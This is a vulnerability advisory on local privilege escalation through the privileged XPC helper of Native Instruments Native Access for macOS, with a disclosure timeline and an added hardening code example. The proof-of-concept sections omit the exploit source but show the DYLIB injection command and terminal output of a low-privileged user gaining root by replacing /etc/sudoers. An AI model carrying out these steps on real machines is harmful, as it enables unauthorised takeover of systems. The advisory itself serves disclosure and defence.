Multiple vulnerabilities in Native Instruments Native Access (MacOS)

Title

Multiple vulnerabilities

Product

Native Instruments Native Access (MacOS)

Vulnerable Version

verified up to 3.22.0

Fixed Version

-

CVE Number

CVE-2026-24070, CVE-2026-24071

Impact

high

Found

22.07.2025

By

Florian Haselsteiner (Office Vienna) | SEC Consult Vulnerability Lab

Management summary

The privileged helper component of Native Instruments Native Access validates XPC clients insecurely, which allows a local attacker to interact with the privileged helper and trigger privileged actions. Because the helper's capabilities (file copy, delete and permission changes) lack security checks, this results in multiple local privilege escalation vulnerabilities.

Vendor description

"Native Instruments is a leading manufacturer of software and hardware for computer-based audio production and DJing. In June of 2023, iZotope, Plugin Alliance and Brainworx joined us in our mission to develop innovative, fully-integrated solutions for every creative task, profession, and skill level."

Source: https://www.native-instruments.com/en/company/

Business recommendation

The vendor was unreachable and did not respond to multiple contact attempts. No patch is available. Customers should contact the vendor and request a patch. 

SEC Consult highly recommends performing a thorough security review of the product, conducted by security professionals, to identify and resolve potential further security issues.

Vulnerability overview/description

1) Local Privilege Escalation via DYLIB Injection (CVE-2026-24070)

During the installation of the Native Access application, a privileged helper `com.native-instruments.NativeAccess.Helper2` is deployed as well. Native Access uses it to trigger functions via XPC communication, such as copy-file, remove or set-permissions.

The communication with the XPC service of the privileged helper is only allowed if the client process is signed with the corresponding certificate and fulfills the following code signing requirement: 

"anchor trusted and certificate leaf[subject.CN] = \"Developer ID Application: Native Instruments GmbH (83K5EG6Z9V)\""

The Native Access application was found to be signed with the `com.apple.security.cs.allow-dyld-environment-variables` and `com.apple.security.cs.disable-library-validation` entitlements. Together these enable DYLIB injection (via DYLD_INSERT_LIBRARIES) and therefore code execution in the context of this application, which satisfies the helper's code signing requirement.

A low privileged user can exploit the DYLIB injection to trigger functions of the privileged helper XPC service, resulting in privilege escalation by first deleting the /etc/sudoers file and then copying a malicious version of that file to /etc/sudoers.

2) XPC Client Validation via PID (CVE-2026-24071)

It was found that the XPC service uses the PID of the connecting client to verify its code signature. This is considered insecure and can be exploited by PID reuse attacks.

The connection handler function passes _xpc_connection_get_pid(arg2) as the argument to the hasValidSignature function. This value cannot be trusted, since it is vulnerable to PID reuse attacks.

10000a60c    int64_t ___main_block_invoke(int64_t arg1, xpc_object_t arg2)

10000a630        if (_xpc_get_type(object: arg2) != __xpc_type_connection)
10000a64c            return _syslog$DARWIN_EXTSN(5, "Unexpected type")
10000a64c        
10000a65c        if ((hasValidSignature(_xpc_connection_get_pid(arg2)) & 1) == 0)
10000a66c            _syslog$DARWIN_EXTSN(5, "Refused connection from client with bad signature")
10000a674            _xpc_connection_cancel(arg2)
10000a674        
10000a684        _xpc_connection_set_event_handler(arg2, &___block_literal_global)
10000a694        return _xpc_connection_activate(arg2) __tailcall

3) No Path validation in Delete and Copy file

When a file copy or delete call is triggered via XPC, the service does not check whether it should be allowed to delete or copy that file. No restrictions are applied for copying or deleting files. These missing restrictions lead to privilege escalation, because an attacker can delete and then write to /etc/sudoers or /Library/LaunchDaemons.

This issue is not exploitable on its own without a vulnerability that allows connecting to the privileged helper. However, the other two vulnerabilities described in this advisory allow exactly that.
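For comparison, the following is an added hardening example (not Native Instruments' code) of how the connection handler shown above could be written so that neither issue 2 nor issue 3 applies: the PID-based hasValidSignature() lookup is replaced by a peer code signing requirement that libxpc evaluates against the audit token, and every file path is canonicalised and checked against an allowlist before the helper acts on it. It assumes macOS 12 or later, the message keys "op" and "path", a single allowlisted directory, and that the requirement language accepts the `entitlement[...] exists` clauses (verify the string with `csreq -r`).

```objective-c
#import <Foundation/Foundation.h>
#import <xpc/xpc.h>
#include <limits.h>
#include <string.h>
#include <syslog.h>
#include <sys/stat.h>
#include <unistd.h>

// Advisory's requirement plus assumed clauses rejecting clients whose entitlements permit
// DYLD_INSERT_LIBRARIES injection (vuln 1): such a client's identity proves nothing.
static const char *kPeerRequirement =
    "anchor trusted and certificate leaf[subject.CN] = "
    "\"Developer ID Application: Native Instruments GmbH (83K5EG6Z9V)\""
    " and !entitlement[\"com.apple.security.cs.disable-library-validation\"] exists"
    " and !entitlement[\"com.apple.security.cs.allow-dyld-environment-variables\"] exists";

// The check missing from vuln 3: canonicalise the parent (the target may not exist yet),
// refuse "." / ".." and symlinked leaves, then require the (assumed) allowlisted root.
static BOOL pathIsAllowed(const char *raw) {
    if (raw == NULL || raw[0] != '/') return NO;
    NSString *path = @(raw), *leaf = path.lastPathComponent;
    if ([leaf isEqualToString:@"."] || [leaf isEqualToString:@".."]) return NO;
    char parent[PATH_MAX];
    if (realpath(path.stringByDeletingLastPathComponent.fileSystemRepresentation, parent) == NULL) return NO;
    NSString *canonical = [@(parent) stringByAppendingPathComponent:leaf];
    struct stat st;
    if (lstat(canonical.fileSystemRepresentation, &st) == 0 && S_ISLNK(st.st_mode)) return NO;
    return [canonical hasPrefix:@"/Library/Application Support/Native Instruments/"];  // trailing slash matters
}

// Replaces the advisory's ___main_block_invoke: libxpc (macOS 12+) checks the requirement
// against the peer's audit token, which PID reuse cannot spoof, instead of hasValidSignature(pid).
static void handleNewConnection(xpc_connection_t peer) {
    if (xpc_get_type(peer) != XPC_TYPE_CONNECTION) { syslog(LOG_NOTICE, "Unexpected type"); return; }
    if (xpc_connection_set_peer_code_signing_requirement(peer, kPeerRequirement) != 0) {
        syslog(LOG_NOTICE, "Refused connection: code signing requirement not applied");
        xpc_connection_cancel(peer);
        return;
    }
    xpc_connection_set_event_handler(peer, ^(xpc_object_t msg) {
        if (xpc_get_type(msg) != XPC_TYPE_DICTIONARY) return;  // errors (incl. rejected peers)
        // Message keys "op" and "path" are assumed; only the "remove" action is shown.
        const char *op = xpc_dictionary_get_string(msg, "op"), *path = xpc_dictionary_get_string(msg, "path");
        bool ok = op && path && strcmp(op, "remove") == 0 && pathIsAllowed(path) && unlink(path) == 0;
        if (!ok) syslog(LOG_NOTICE, "Refused %s on %s", op ? op : "?", path ? path : "?");
        xpc_object_t reply = xpc_dictionary_create_reply(msg);
        if (reply) { xpc_dictionary_set_bool(reply, "success", ok); xpc_connection_send_message(peer, reply); }
    });
    xpc_connection_activate(peer);
}
```

A peer that fails the requirement never reaches the message handler; libxpc delivers an XPC_ERROR_PEER_CODE_SIGNING_REQUIREMENT error event instead, so the refusal is visible in the helper's log as well.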

Proof of concept

1) Local Privilege Escalation via DYLIB Injection (CVE-2026-24070) 

To check for the dangerous entitlements `com.apple.security.cs.allow-dyld-environment-variables` and `com.apple.security.cs.disable-library-validation` the "codesign" utility of MacOS can be used:

lowpriv@Users-Mac exploit % codesign -dvv --entitlements :- /Applications/Native\ Access.app/Contents/MacOS/Native\ Access
Executable=/Applications/Native Access.app/Contents/MacOS/Native Access
Identifier=com.native-instruments.nativeaccess2
[...]
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "https://www.apple.com/DTDs/PropertyList-1.0.dtd"><plist version="1.0">
    <dict>
        <key>com.apple.security.cs.allow-dyld-environment-variables</key>
        <true/>
        <key>com.apple.security.cs.allow-jit</key>
        <true/>
        <key>com.apple.security.cs.allow-unsigned-executable-memory</key>
        <true/>
        <key>com.apple.security.cs.disable-library-validation</key>
        <true/>
    </dict>
</plist>

The privileged helper located at /Library/PrivilegedHelperTools/com.native-instruments.NativeAccess.Helper2 was found to check the code signature of the XPC client before running any action. Due to the DYLIB injection vulnerability in the Native Access executable, it is possible to execute code in the context of the Native Access process, which carries a valid signature for the required Team ID. The XPC service exposes multiple functions, e.g. copy-file and remove.

The following code was used to craft a malicious DYLIB which, on load, connects to the privileged helper XPC service and deletes the /etc/sudoers file, so that it can then copy a malicious version of the sudoers file to /etc/sudoers.

[ PoC exploit code removed ]

On a Mac system with the developer tools installed the PoC library can be compiled as follows:

$ clang -framework Foundation -dynamiclib -o libxpcclient.dylib libxpcclient.m

Before running the exploit ensure that the file /tmp/bad_sudoers exists and is a valid sudoers file! The exploit can then be executed using the DYLIB injection:

$ DYLD_INSERT_LIBRARIES=<path_to_DYLIB> "/Applications/Native Access.app/Contents/MacOS/Native Access"

The bad_sudoers file will then be copied to /etc/sudoers.

lowpriv@Users-Mac ~ % id
uid=503(lowpriv) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),399(com.apple.access_ssh-disabled),701(com.apple.sharepoint.group.1),703(com.apple.sharepoint.group.3),100(_lpoperator),702(com.apple.sharepoint.group.2)
lowpriv@Users-Mac ~ % sudo id
Password:
lowpriv is not in the sudoers file.
This incident has been reported to the administrator.
lowpriv@Users-Mac ~ % DYLD_INSERT_LIBRARIES=/Users/lowpriv/Desktop/exploit/libxpcclient.dylib "/Applications/Native Access.app/Contents/MacOS/Native Access"
2025-07-22 05:38:03.334 Native Access[35760:498359] [+] Dylib loaded. Starting XPC communication...
2025-07-22 05:38:03.458 Native Access[35760:498359] Received reply:
2025-07-22 05:38:03.458 Native Access[35760:498359] success: <bool: 0x20a033370>: true
2025-07-22 05:38:03.466 Native Access[35760:498359] Received reply:
2025-07-22 05:38:03.466 Native Access[35760:498359] success: <bool: 0x20a033370>: true
^C
lowpriv@Users-Mac ~ % sudo id
Password:
uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),12(everyone),20(staff),29(certusers),61(localaccounts),80(admin),701(com.apple.sharepoint.group.1),703(com.apple.sharepoint.group.3),33(_appstore),98(_lpadmin),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh-disabled),400(com.apple.access_remote_ae),702(com.apple.sharepoint.group.2)

2) XPC Client Validation via PID (CVE-2026-24071)

To exploit the PID usage for the client validation, a known PID reuse attack can be used. There are several templates for this attack available. The following code can be used to exploit this:

[ PoC exploit code removed ]

3) No Path validation in Delete and Copy file

No PoC available.

Vulnerable / tested versions

The following versions have been tested on MacOS Sequoia and MacOS Tahoe:

  • verified on 3.18.1, 3.19.0, 3.20.1, 3.21.0, 3.21.1 and up to 3.22.0 (potentially all lower versions might be vulnerable too).

Vendor contact timeline

2025-07-23 Contacting vendor through info@native-instruments.com; No response
2025-08-07 Contacting vendor again, adding various other emails found on the website. No response.
2025-09-16 Trying to establish contacts via LinkedIn. No response.
2025-10-13 Registering support account and using "Support Chat" function. No response except spam newsletters.
2026-02-02 Release of advisory.

Solution

The vendor was unreachable and did not respond to multiple contact attempts. No patch is available. Customers should contact the vendor and request a patch.

Workaround

None

Advisory URL

https://sec-consult.com/vulnerability-lab/

EOF Florian Haselsteiner / @2026
